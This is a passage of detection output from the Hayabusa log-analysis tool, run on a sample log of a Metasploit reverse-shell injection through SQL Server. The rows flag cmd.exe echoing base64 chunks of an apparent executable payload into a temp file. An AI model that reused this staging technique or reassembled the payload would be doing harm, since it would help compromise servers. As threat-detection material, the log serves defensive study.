0AAATOAAAWzgAANM4AAAAAAADEyQAA2MsAAMbLAAC4ywAAqMsAAJjLAACEywAAeMsAAGjLAABYywAASssAAELLAAA4ywAAKssAABTLAAAKywAAAMsAAPbKAADsygAA4MoAANjKAADOygAAxMoAALTKAACkygAAmsoAAJLKAACIygAAfsoAAHTKAABsygAAZMoAAFzKAABSygAASMoAAD7KAAA0ygAAKsoAACDKAAAWygAACsoAAALKAAD6yQAA6skAAODJAADWyQAAzMkAAOzLAADczwAA0M8AAAAAAAC6zwAAsM8AAAAAAAAHAACABAAAgAkAAIA0AACADgAAgAwAAIAVAACAFwAAgAMAAIASAACACgAAgJcAAIBzAACAdAAAgG8AAIAAAAAAAAAAADaAwUoAAAAAAgAAAEoAAAAAAAAAACABAAAAAAAAAAAAAADgP3sUrkfheoQ//Knx0k1iUD8AAAAAAABQPwAAAAAAQI9AAAAAAAAA8D8AAAAAAAAAAI3ttaD3xrA+AAAAAB8AAAA7AAAAWgAAAHgAAACXAAAAtQAAANQAAADzAAAAEQEAADABAABOAQAAMgEAAFEBAAAAAAAAHwAAAD0AAABcAAAAegAAAJkAAAC4AAAA1gAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xea0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:21.772 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo APUAAAATAQAAKG51bGwpAAAwMTIzNDU2Nzg5YWJjZGVmAAAAADAxMjM0NTY3ODlBQkNERUYAAAAAMDEyMzQ1Njc4OWFiY2RlZgAAAAAwMTIzNDU2Nzg5QUJDREVGAAAAAAAAAAAAACRAAAAAAAAAJMC4HoXrUbieP5qZmZmZmbk/FCcAADz5QAAZJwAALPlAAB0nAAAY+UAAHicAAAz5QAAmJwAA+PhAACgnAADg+EAAMycAAMj4QAA0JwAArPhAADUnAACM+EAANicAAGz4QAA3JwAATPhAADgnAAA4+EAAOScAABj4QAA6JwAABPhAADsnAADs90AAPCcAAND3QAA9JwAArPdAAD4nAACM90AAPycAAGz3QABAJwAAVPdAAEEnAAA090AAQicAACT3QABDJwAADPdAAEQnAAD09kAARScAAND2QABGJwAAtPZAAEcnAACY9kAASCcAAHz2QABJJwAAZPZAAEonAABA9kAASycAABz2QABMJwAABPZAAE0nAADw9UAATicAAMz1QABPJwAAuPVAAFAnAACo9UAAUScAAJT1QABSJwAAgPVAAFMnAABs9UAAVCcAAFz1QABVJwAASPVAAFYnAAAw9UAAVycAAAz1QABrJwAA7PRAAGwnAADM9EAAbScAALD0QAB1JwAAkPRAAPkqAACA9EAA/CoAAFz0QAAAAAAAAAAAAEphbgBGZWIATWFyAEFwcgBNYXkASnVuAEp1bABBdWcAU2VwAE9jdABOb3YARGVjAFN1bgBNb24AVHVlAFdlZABUaHUARnJpAFNhdAA8AkEAMAJBACgCQQAgAkEAGAJBAAwCQQAwMTIzNDU2Nzg5AAAAAAAAAAAAAAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAEBAgEDAwMDAwMCAQEBAQABAQEBAQEBAQEBAAMCAQICAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAwIDAwEDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEDAgMDAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQD5AQEA/NDU2Nzg5Ojs8PUBAQEBAQEAAAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGUBAQEBAQBobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.047 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo QEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8AAAAAAAAAAP////8qt0AAPrdAAKzIAAAAAAAAAAAAAB7LAADIwAAA8McAAAAAAAAAAAAAYs8AAAzAAADkxwAAAAAAAAAAAACWzwAAAMAAAITJAAAAAAAAAAAAAKTPAACgwQAAeMkAAAAAAAAAAAAAxM8AAJTBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIzPAABwzwAAAAAAAFLPAABGzwAAOs8AACrPAAAYzwAACM8AAPLOAADezgAAxs4AALrOAACqzgAAks4AAHrOAABezgAATs4AAEDOAAD6ywAACswAACTMAAA+zAAATMwAAF7MAABqzAAAdMwAAIbMAACazAAAsswAAMDMAADazAAA8swAAAzNAAAmzQAAPs0AAGDNAABozQAAes0AAIrNAACgzQAAsM0AAMDNAADSzQAA4M0AAO7NAAAEzgAAFs4AADTOAAAAAAAAxMkAANjLAADGywAAuMsAAKjLAACYywAAhMsAAHjLAABoywAAWMsAAErLAABCywAAOMsAACrLAAAUywAACssAAADLAAD2ygAA7MoAAODKAADYygAAzsoAAMTKAAC0ygAApMoAAJrKAACSygAAiMoAAH7KAAB0ygAAbMoAAGTKAABcygAAUsoAAEjKAAA+ygAANMoAACrKAAAgygAAFsoAAArKAAACygAA+skAAOrJAADgyQAA1skAAMzJAADsywAA3M8AANDPAAAAAAAAus8AALDPAAAAAAAABwAAgAQAAIAJAACANAAAgA4AAIAMAACAFQAAgBcAAIADAACAEgAAgAoAAICXAACAcwAAgHQAAIBvAACAAAAAABMBX2lvYgAAWAJmcHJpbnRmALcCc3RyY2hyAACOAV9wY3R5cGUAYQBfX21iX2N1cl9tYXgAAEkCZXhpdAAAPQJhdG9pAAAVAV9pc2N0eXBlAACeAnByaW50ZgAArwJzaWduYWwAAJECbWFsbG9jAABAAmNhbGxvYwAATwJmZmx1c2gAAEwCZmNsb3NlAACcAnBlcnJvcgAAVwJmb3BlbgCkAnFzb3J0APEAX2Z0b2wAwQJzdHJuY3B5AMUCc3Ryc3RyAADAAnN0cm5jbXAAXgJmcmVlAADIAF9lcnJubwAAegBfX3BfX3dlbnZpcm9uAG0AX19wX19lbnZpcm9uAACnAnJlYWxsb2MAxAJzdHJzcG4AAJsCbW9kZgAAvAJzdHJlcnJvcgAA4wJ3Y3NjcHkAAOYCd2NzbGVuAACzAF9jbG9zZQAA6AJ3Y3NuY21wAMMCc3RycmNocgBNU1ZDUlQuZGxsAABVAF9fZGxsb25leGl0AIYBX29u>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x121c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.320 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXhpdADTAF9leGl0AEgAX1hjcHRGaWx0ZXIAZABfX3BfX19pbml0ZW52AFgAX19nZXRtYWluYXJncwAPAV9pbml0dGVybQCDAF9fc2V0dXNlcm1hdGhlcnIAAJ0AX2FkanVzdF9mZGl2AABqAF9fcF9fY29tbW9kZQAAbwBfX3BfX2Ztb2RlAACBAF9fc2V0X2FwcF90eXBlAADKAF9leGNlcHRfaGFuZGxlcjMAALcAX2NvbnRyb2xmcAAAHQNTZXRMYXN0RXJyb3IAAO4ARnJlZUVudmlyb25tZW50U3RyaW5nc1cATwFHZXRFbnZpcm9ubWVudFN0cmluZ3NXAAD1AUdsb2JhbEZyZWUAAAkBR2V0Q29tbWFuZExpbmVXAFYDVGxzQWxsb2MAAFcDVGxzRnJlZQCMAER1cGxpY2F0ZUhhbmRsZQA6AUdldEN1cnJlbnRQcm9jZXNzABoDU2V0SGFuZGxlSW5mb3JtYXRpb24AAC4AQ2xvc2VIYW5kbGUAwAFHZXRTeXN0ZW1UaW1lQXNGaWxlVGltZQC8AEZpbGVUaW1lVG9TeXN0ZW1UaW1lAADYAUdldFRpbWVab25lSW5mb3JtYXRpb24AALsARmlsZVRpbWVUb0xvY2FsRmlsZVRpbWUATgNTeXN0ZW1UaW1lVG9GaWxlVGltZQAATwNTeXN0ZW1UaW1lVG9UelNwZWNpZmljTG9jYWxUaW1lAEkDU2xlZXAA6gBGb3JtYXRNZXNzYWdlQQAAaQFHZXRMYXN0RXJyb3IAAIUDV2FpdEZvclNpbmdsZU9iamVjdABJAENyZWF0ZUV2ZW50QQAALANTZXRTdGRIYW5kbGUAABADU2V0RmlsZVBvaW50ZXIAAE0AQ3JlYXRlRmlsZUEAUABDcmVhdGVGaWxlVwCMAUdldE92ZXJsYXBwZWRSZXN1bHQAgwBEZXZpY2VJb0NvbnRyb2wAWgFHZXRGaWxlSW5mb3JtYXRpb25CeUhhbmRsZQAAUgJMb2NhbEZyZWUAXgFHZXRGaWxlVHlwZQBaAENyZWF0ZU11dGV4QQAAGQJJbml0aWFsaXplQ3JpdGljYWxTZWN0aW9uAHoARGVsZXRlQ3JpdGljYWxTZWN0aW9uAI8ARW50ZXJDcml0aWNhbFNlY3Rpb24AALgCUmVsZWFzZU11dGV4AAALA1NldEV2ZW50AABHAkxlYXZlQ3JpdGljYWxTZWN0aW9uAABRA1Rlcm1pbmF0ZVByb2Nlc3MAAFIBR2V0RXhpdENvZGVQcm9jZXNzAADfAUdldFZlcnNpb25FeEEAmAFHZXRQcm9jQWRkcmVzcwAASAJMb2FkTGlicmFyeUEAAJcDV3JpdGVGaWxlAKsCUmVhZEZpbGUAAIcCUGVla05hbWVkUGlwZQBLRVJORUwzMi5kbGwAAB0AQWxsb2NhdGVBbmRJbml0aWFsaXplU2lkAADhAEZy>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.593 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZWVTaWQAQURWQVBJMzIuZGxsAABXU09DSzMyLmRsbAA5AFdTQVNlbmQANABXU0FSZWN2AFdTMl8zMi5kbGwAAMUBX3N0cm5pY21wAL8BX3N0cmR1cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAZAAAAAEAAAABAAAAAQAAAAAAAACAw8kBAAAAAOALQQAyAAAAQgAAAEsAAABQAAAAWgAAAF8AAABiAAAAYwAAAGQAAAAlczogQ2Fubm90IHVzZSBjb25jdXJyZW5jeSBsZXZlbCBncmVhdGVyIHRoYW4gdG90YWwgbnVtYmVyIG9mIHJlcXVlc3RzCgAlczogSW52YWxpZCBDb25jdXJyZW5jeSBbUmFuZ2UgMC4uJWRdCgAAJXM6IGludmFsaWQgVVJMCgAAAAAlczogd3JvbmcgbnVtYmVyIG9mIGFyZ3VtZW50cwoAAFVzZXItQWdlbnQ6AEFjY2VwdDoASG9zdDoAAABQcm94eS1BdXRob3JpemF0aW9uOiBCYXNpYyAAUHJveHkgY3JlZGVudGlhbHMgdG9vIGxvbmcKAEF1dGhvcml6YXRpb246IEJhc2ljIAAAAEF1dGhlbnRpY2F0aW9uIGNyZWRlbnRpYWxzIHRvbyBsb25nCgAAAABDb29raWU6IAAAAAANCgAAQ2Fubm90IG1peCBQVVQgYW5kIEhFQUQKAAAAAENhbm5vdCBtaXggUE9TVCBhbmQgSEVBRAoAAABDYW5ub3QgbWl4IFBPU1QvUFVUIGFuZCBIRUFECgAAAEludmFsaWQgbnVtYmVyIG9mIHJlcXVlc3RzCgBuOmM6dDpiOlQ6cDp1OnY6cmtWaHdpeDp5Ono6QzpIOlA6QTpnOlg6ZGU6U3EAAABiZ2NvbG9yPXdoaXRlAAAAVG90YWwgb2YgJWQgcmVxdWVzdHMgY29tcGxldGVkCgAlcwoALi5kb25lCgBGaW5pc2hlZCAlZCByZXF1ZXN0cwoAAABhcHJfc29ja2V0X2Nvbm5lY3QoKQAAAAAKVGVzdCBhYm9ydGVkIGFmdGVyIDEwIGZhaWx1cmVzCgoAAAAKU2VydmVyIHRpbWVkIG91dAoKAGFwcl9wb2xsAAAAAGFwcl9zb2NrYWRkcl9pbmZvX2dldCgpIGZvciAlcwAAZXJyb3IgY3JlYXRpbmcgcmVxdWVzdCBidWZmZXI6IG91dCBvZiBtZW1vcnkKAAAASU5GTzogJXMgaGVhZGVyID09IAotLS0KJXMKLS0tCgBSZXF1ZXN0IHRvbyBsb25nCgAAACVzICVzIEhUVFAvMS4wDQolcyVzJXNDb250ZW50LWxlbmd0aDogJXUNCkNvbnRlbnQtdHlwZTogJXMNCiVzDQoAAAAAUFVUAFBPU1QAAAAAdGV4dC9wbGFpbgAAJXMgJXMgSFRUUC8xLjAN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x20 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:22.867 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo CiVzJXMlcyVzDQoAAEhFQUQAAAAAR0VUAENvbm5lY3Rpb246IEtlZXAtQWxpdmUNCgAAAABBY2NlcHQ6ICovKg0KAAAAVXNlci1BZ2VudDogQXBhY2hlQmVuY2gvAAAAADIuMwBIb3N0OiAAAGFwcl9wb2xsc2V0X2NyZWF0ZSBmYWlsZWQAAAAoYmUgcGF0aWVudCklcwAALi4uAAoAAABbdGhyb3VnaCAlczolZF0gAAAAAEJlbmNobWFya2luZyAlcyAAAAAAJXM6ICVzICglZCkKAAAAAFNlbmQgcmVxdWVzdCBmYWlsZWQhCgAAAFNlbmQgcmVxdWVzdCB0aW1lZCBvdXQhCgAAAAAlcwklSTY0ZAklSTY0ZAklSTY0ZAklSTY0ZAklSTY0ZAoAAABzdGFydHRpbWUJc2Vjb25kcwljdGltZQlkdGltZQl0dGltZQl3YWl0CgAAAENhbm5vdCBvcGVuIGdudXBsb3Qgb3V0cHV0IGZpbGUAJWQsJS4zZgoAAAAAUGVyY2VudGFnZSBzZXJ2ZWQsVGltZSBpbiBtcwoAAABDYW5ub3Qgb3BlbiBDU1Ygb3V0cHV0IGZpbGUAdwAAACAgJWQlJSAgJTVJNjRkCgAgMTAwJSUgICU1STY0ZCAobG9uZ2VzdCByZXF1ZXN0KQoAAAAgMCUlICA8MD4gKG5ldmVyKQoAAApQZXJjZW50YWdlIG9mIHRoZSByZXF1ZXN0cyBzZXJ2ZWQgd2l0aGluIGEgY2VydGFpbiB0aW1lIChtcykKAABUb3RhbDogICAgICAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAABQcm9jZXNzaW5nOiAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAABDb25uZWN0OiAgICAlNUk2NGQgJTVJNjRkJTVJNjRkCgAAAAAgICAgICAgICAgICAgIG1pbiAgIGF2ZyAgIG1heAoAAFdBUk5JTkc6IFRoZSBtZWRpYW4gYW5kIG1lYW4gZm9yIHRoZSB0b3RhbCB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAAAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgdG90YWwgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgBXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgd2FpdGluZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRo>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.140 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHdhaXRpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAAAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgcHJvY2Vzc2luZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHByb2Nlc3NpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG5vdCB3aXRoaW4gYSBub3JtYWwgZGV2aWF0aW9uCiAgICAgICAgVGhlc2UgcmVzdWx0cyBhcmUgcHJvYmFibHkgbm90IHRoYXQgcmVsaWFibGUuCgAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG1vcmUgdGhhbiB0d2ljZSB0aGUgc3RhbmRhcmQKICAgICAgIGRldmlhdGlvbiBhcGFydC4gVGhlc2UgcmVzdWx0cyBhcmUgTk9UIHJlbGlhYmxlLgoAAAAAVG90YWw6ICAgICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAV2FpdGluZzogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAUHJvY2Vzc2luZzogJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAQ29ubmVjdDogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAICAgICAgICAgICAgICBtaW4gIG1lYW5bKy8tc2RdIG1lZGlhbiAgIG1heAoAAAAACkNvbm5lY3Rpb24gVGltZXMgKG1zKQoAICAgICAgICAgICAgICAgICAgICAgICAgJS4yZiBrYi9zIHRvdGFsCgAAAAAgICAgICAgICAgICAg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.414 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ICAgICAgICAgICAlLjJmIGtiL3Mgc2VudAoAVHJhbnNmZXIgcmF0ZTogICAgICAgICAgJS4yZiBbS2J5dGVzL3NlY10gcmVjZWl2ZWQKAFRpbWUgcGVyIHJlcXVlc3Q6ICAgICAgICUuM2YgW21zXSAobWVhbiwgYWNyb3NzIGFsbCBjb25jdXJyZW50IHJlcXVlc3RzKQoAAABUaW1lIHBlciByZXF1ZXN0OiAgICAgICAlLjNmIFttc10gKG1lYW4pCgAAAFJlcXVlc3RzIHBlciBzZWNvbmQ6ICAgICUuMmYgWyMvc2VjXSAobWVhbikKAAAAAEhUTUwgdHJhbnNmZXJyZWQ6ICAgICAgICVJNjRkIGJ5dGVzCgAAAABUb3RhbCBQVVQ6ICAgICAgICAgICAgICAlSTY0ZAoAAFRvdGFsIFBPU1RlZDogICAgICAgICAgICVJNjRkCgAAVG90YWwgdHJhbnNmZXJyZWQ6ICAgICAgJUk2NGQgYnl0ZXMKAAAAAEtlZXAtQWxpdmUgcmVxdWVzdHM6ICAgICVkCgBOb24tMnh4IHJlc3BvbnNlczogICAgICAlZAoAV3JpdGUgZXJyb3JzOiAgICAgICAgICAgJWQKACAgIChDb25uZWN0OiAlZCwgUmVjZWl2ZTogJWQsIExlbmd0aDogJWQsIEV4Y2VwdGlvbnM6ICVkKQoAAEZhaWxlZCByZXF1ZXN0czogICAgICAgICVkCgBDb21wbGV0ZSByZXF1ZXN0czogICAgICAlZAoAVGltZSB0YWtlbiBmb3IgdGVzdHM6ICAgJS4zZiBzZWNvbmRzCgAAAENvbmN1cnJlbmN5IExldmVsOiAgICAgICVkCgBEb2N1bWVudCBMZW5ndGg6ICAgICAgICAldSBieXRlcwoAAABEb2N1bWVudCBQYXRoOiAgICAgICAgICAlcwoAU2VydmVyIFBvcnQ6ICAgICAgICAgICAgJWh1CgAAAABTZXJ2ZXIgSG9zdG5hbWU6ICAgICAgICAlcwoAU2VydmVyIFNvZnR3YXJlOiAgICAgICAgJXMKAAoKAAA8L3RhYmxlPgoAAAAAAAAAPHRyICVzPjx0aCAlcz5Ub3RhbDo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggJXM+UHJvY2Vzc2luZzo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggJXM+Q29ubmVjdDo8L3RoPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjx0ZCAlcz4lNUk2NGQ8L3RkPjwvdHI+CgA8dHIg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x82c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.687 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo JXM+PHRoICVzPiZuYnNwOzwvdGg+IDx0aCAlcz5taW48L3RoPiAgIDx0aCAlcz5hdmc8L3RoPiAgIDx0aCAlcz5tYXg8L3RoPjwvdHI+CgA8dHIgJXM+PHRoICVzIGNvbHNwYW49ND5Db25ubmVjdGlvbiBUaW1lcyAobXMpPC90aD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49MiAlcz4mbmJzcDs8L3RkPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHRvdGFsPC90ZD48L3RyPgoAADx0ciAlcz48dGQgY29sc3Bhbj0yICVzPiZuYnNwOzwvdGQ+PHRkIGNvbHNwYW49MiAlcz4lLjJmIGtiL3Mgc2VudDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VHJhbnNmZXIgcmF0ZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZiBrYi9zIHJlY2VpdmVkPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+UmVxdWVzdHMgcGVyIHNlY29uZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JS4yZjwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkhUTUwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Ub3RhbCBQVVQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkPC90ZD48L3RyPgoAAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRvdGFsIFBPU1RlZDo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JUk2NGQ8L3RkPjwvdHI+CgAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+VG90YWwgdHJhbnNmZXJyZWQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVJNjRkIGJ5dGVzPC90ZD48L3RyPgoAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPktlZXAtQWxpdmUgcmVxdWVzdHM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+Tm9uLTJ4eCByZXNwb25zZXM6PC90aD48dGQgY29sc3Bhbj0yICVzPiVkPC90ZD48L3RyPgoAAAA8dHIgJXM+PHRkIGNvbHNwYW49NCAlcyA+ICAgKENvbm5lY3Q6ICVkLCBMZW5ndGg6ICVkLCBFeGNlcHRpb25zOiAlZCk8L3RkPjwvdHI+CgAAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RmFpbGVkIHJlcXVlc3Rz>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx 2020-08-02 07:58:23.962 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 